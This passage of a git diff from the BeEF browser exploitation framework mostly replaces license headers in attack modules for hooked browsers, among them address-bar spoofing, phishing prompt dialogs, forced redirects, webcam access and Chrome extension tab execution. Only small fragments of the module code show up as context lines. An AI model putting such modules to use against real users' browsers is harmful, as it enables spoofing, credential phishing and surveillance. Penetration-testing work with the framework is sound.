+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var tel_number = "<%= @tel_number %>";
diff --git a/modules/browser/hooked_domain/link_rewrite_tel/config.yaml b/modules/browser/hooked_domain/link_rewrite_tel/config.yaml
index 68618861e..54c7ef2d9 100644
--- a/modules/browser/hooked_domain/link_rewrite_tel/config.yaml
+++ b/modules/browser/hooked_domain/link_rewrite_tel/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/browser/hooked_domain/link_rewrite_tel/module.rb b/modules/browser/hooked_domain/link_rewrite_tel/module.rb
index 929c62356..58de13fb5 100644
--- a/modules/browser/hooked_domain/link_rewrite_tel/module.rb
+++ b/modules/browser/hooked_domain/link_rewrite_tel/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Link_rewrite_tel < BeEF::Core::Command
 
diff --git a/modules/browser/hooked_domain/mobilesafari_address_spoofing/command.js b/modules/browser/hooked_domain/mobilesafari_address_spoofing/command.js
index 48cbdaab1..05d4a3354 100644
--- a/modules/browser/hooked_domain/mobilesafari_address_spoofing/command.js
+++ b/modules/browser/hooked_domain/mobilesafari_address_spoofing/command.js
@@ -1,19 +1,10 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
 
+
 var somethingsomething = function() {
 	var fake_url = "<%= @fake_url %>";
 	var real_url = "<%= @real_url %>";
diff --git a/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml b/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml
index 3aa49f32f..72183d8b6 100644
--- a/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml
+++ b/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/browser/hooked_domain/mobilesafari_address_spoofing/module.rb b/modules/browser/hooked_domain/mobilesafari_address_spoofing/module.rb
index b5f95a712..5c35bc400 100644
--- a/modules/browser/hooked_domain/mobilesafari_address_spoofing/module.rb
+++ b/modules/browser/hooked_domain/mobilesafari_address_spoofing/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Mobilesafari_address_spoofing < BeEF::Core::Command
 
diff --git a/modules/browser/hooked_domain/prompt_dialog/command.js b/modules/browser/hooked_domain/prompt_dialog/command.js
index ab02786fb..71c43e538 100644
--- a/modules/browser/hooked_domain/prompt_dialog/command.js
+++ b/modules/browser/hooked_domain/prompt_dialog/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
   
   var answer = prompt("<%== @question %>","")
diff --git a/modules/browser/hooked_domain/prompt_dialog/config.yaml b/modules/browser/hooked_domain/prompt_dialog/config.yaml
index 0f9035279..def589af4 100644
--- a/modules/browser/hooked_domain/prompt_dialog/config.yaml
+++ b/modules/browser/hooked_domain/prompt_dialog/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/browser/hooked_domain/prompt_dialog/module.rb b/modules/browser/hooked_domain/prompt_dialog/module.rb
index 0718acbf9..393cb35f5 100644
--- a/modules/browser/hooked_domain/prompt_dialog/module.rb
+++ b/modules/browser/hooked_domain/prompt_dialog/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Prompt_dialog < BeEF::Core::Command
   
diff --git a/modules/browser/hooked_domain/replace_video/command.js b/modules/browser/hooked_domain/replace_video/command.js
index 28ca0622f..033fe3e12 100644
--- a/modules/browser/hooked_domain/replace_video/command.js
+++ b/modules/browser/hooked_domain/replace_video/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 	$j('<%= @jquery_selector %>').each(function(){
                 var width = $j(this).css('width');
diff --git a/modules/browser/hooked_domain/replace_video/config.yaml b/modules/browser/hooked_domain/replace_video/config.yaml
index f8ddbcda0..8c88b92b4 100644
--- a/modules/browser/hooked_domain/replace_video/config.yaml
+++ b/modules/browser/hooked_domain/replace_video/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/browser/hooked_domain/replace_video/module.rb b/modules/browser/hooked_domain/replace_video/module.rb
index c99c020c4..e5c63c9f1 100644
--- a/modules/browser/hooked_domain/replace_video/module.rb
+++ b/modules/browser/hooked_domain/replace_video/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Replace_video < BeEF::Core::Command
 
diff --git a/modules/browser/hooked_domain/rickroll/command.js b/modules/browser/hooked_domain/rickroll/command.js
index 2ac24b3eb..331b3ba8a 100644
--- a/modules/browser/hooked_domain/rickroll/command.js
+++ b/modules/browser/hooked_domain/rickroll/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 	$j('body').html('');
 
diff --git a/modules/browser/hooked_domain/rickroll/config.yaml b/modules/browser/hooked_domain/rickroll/config.yaml
index f86c183fa..9209a0685 100644
--- a/modules/browser/hooked_domain/rickroll/config.yaml
+++ b/modules/browser/hooked_domain/rickroll/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/browser/hooked_domain/rickroll/module.rb b/modules/browser/hooked_domain/rickroll/module.rb
index 920b9065c..66c8fa76a 100644
--- a/modules/browser/hooked_domain/rickroll/module.rb
+++ b/modules/browser/hooked_domain/rickroll/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Rickroll < BeEF::Core::Command
   
diff --git a/modules/browser/hooked_domain/site_redirect/command.js b/modules/browser/hooked_domain/site_redirect/command.js
index 2c48293fd..27dcd8594 100644
--- a/modules/browser/hooked_domain/site_redirect/command.js
+++ b/modules/browser/hooked_domain/site_redirect/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	window.location = "<%= @redirect_url %>";
diff --git a/modules/browser/hooked_domain/site_redirect/config.yaml b/modules/browser/hooked_domain/site_redirect/config.yaml
index 3c9681e0a..d1a020585 100644
--- a/modules/browser/hooked_domain/site_redirect/config.yaml
+++ b/modules/browser/hooked_domain/site_redirect/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/browser/hooked_domain/site_redirect/module.rb b/modules/browser/hooked_domain/site_redirect/module.rb
index 25dcee03e..aa178b8df 100644
--- a/modules/browser/hooked_domain/site_redirect/module.rb
+++ b/modules/browser/hooked_domain/site_redirect/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Site_redirect < BeEF::Core::Command
   
diff --git a/modules/browser/hooked_domain/site_redirect_iframe/command.js b/modules/browser/hooked_domain/site_redirect_iframe/command.js
index f707b25f7..153fa69a6 100644
--- a/modules/browser/hooked_domain/site_redirect_iframe/command.js
+++ b/modules/browser/hooked_domain/site_redirect_iframe/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var result = 'Iframe successfully created!';
diff --git a/modules/browser/hooked_domain/site_redirect_iframe/config.yaml b/modules/browser/hooked_domain/site_redirect_iframe/config.yaml
index ad73b2efe..1e4d1ac8a 100644
--- a/modules/browser/hooked_domain/site_redirect_iframe/config.yaml
+++ b/modules/browser/hooked_domain/site_redirect_iframe/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/browser/hooked_domain/site_redirect_iframe/module.rb b/modules/browser/hooked_domain/site_redirect_iframe/module.rb
index 8ca97afa1..6d25c3aad 100644
--- a/modules/browser/hooked_domain/site_redirect_iframe/module.rb
+++ b/modules/browser/hooked_domain/site_redirect_iframe/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Site_redirect_iframe < BeEF::Core::Command
   
diff --git a/modules/browser/play_sound/command.js b/modules/browser/play_sound/command.js
index f0c4c7b58..f674c6730 100644
--- a/modules/browser/play_sound/command.js
+++ b/modules/browser/play_sound/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {	
 
     function playSound(url) {
diff --git a/modules/browser/play_sound/config.yaml b/modules/browser/play_sound/config.yaml
index 34d95eed7..46e15808a 100644
--- a/modules/browser/play_sound/config.yaml
+++ b/modules/browser/play_sound/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/browser/play_sound/module.rb b/modules/browser/play_sound/module.rb
index ecb66ab2e..6de2fab29 100644
--- a/modules/browser/play_sound/module.rb
+++ b/modules/browser/play_sound/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Play_sound < BeEF::Core::Command
   
diff --git a/modules/browser/unhook/command.js b/modules/browser/unhook/command.js
index 8ab5edce1..1301e0254 100644
--- a/modules/browser/unhook/command.js
+++ b/modules/browser/unhook/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent unhook request");
diff --git a/modules/browser/unhook/config.yaml b/modules/browser/unhook/config.yaml
index 70885f341..47a88e326 100644
--- a/modules/browser/unhook/config.yaml
+++ b/modules/browser/unhook/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/browser/unhook/module.rb b/modules/browser/unhook/module.rb
index 63f5c8df1..f711022c7 100644
--- a/modules/browser/unhook/module.rb
+++ b/modules/browser/unhook/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Unhook < BeEF::Core::Command
 
diff --git a/modules/browser/webcam/command.js b/modules/browser/webcam/command.js
index 9ed0f73a5..48c2b77ff 100644
--- a/modules/browser/webcam/command.js
+++ b/modules/browser/webcam/command.js
@@ -1,20 +1,11 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
 
 
+
 beef.execute(function() {
     
     /*
diff --git a/modules/browser/webcam/config.yaml b/modules/browser/webcam/config.yaml
index 69f3eb5fb..539e5751a 100644
--- a/modules/browser/webcam/config.yaml
+++ b/modules/browser/webcam/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/browser/webcam/module.rb b/modules/browser/webcam/module.rb
index de2df6639..0130d5b34 100644
--- a/modules/browser/webcam/module.rb
+++ b/modules/browser/webcam/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 require 'base64'
 class Webcam < BeEF::Core::Command
diff --git a/modules/chrome_extensions/execute_tabs/command.js b/modules/chrome_extensions/execute_tabs/command.js
index 1b9ceb907..10219874c 100644
--- a/modules/chrome_extensions/execute_tabs/command.js
+++ b/modules/chrome_extensions/execute_tabs/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
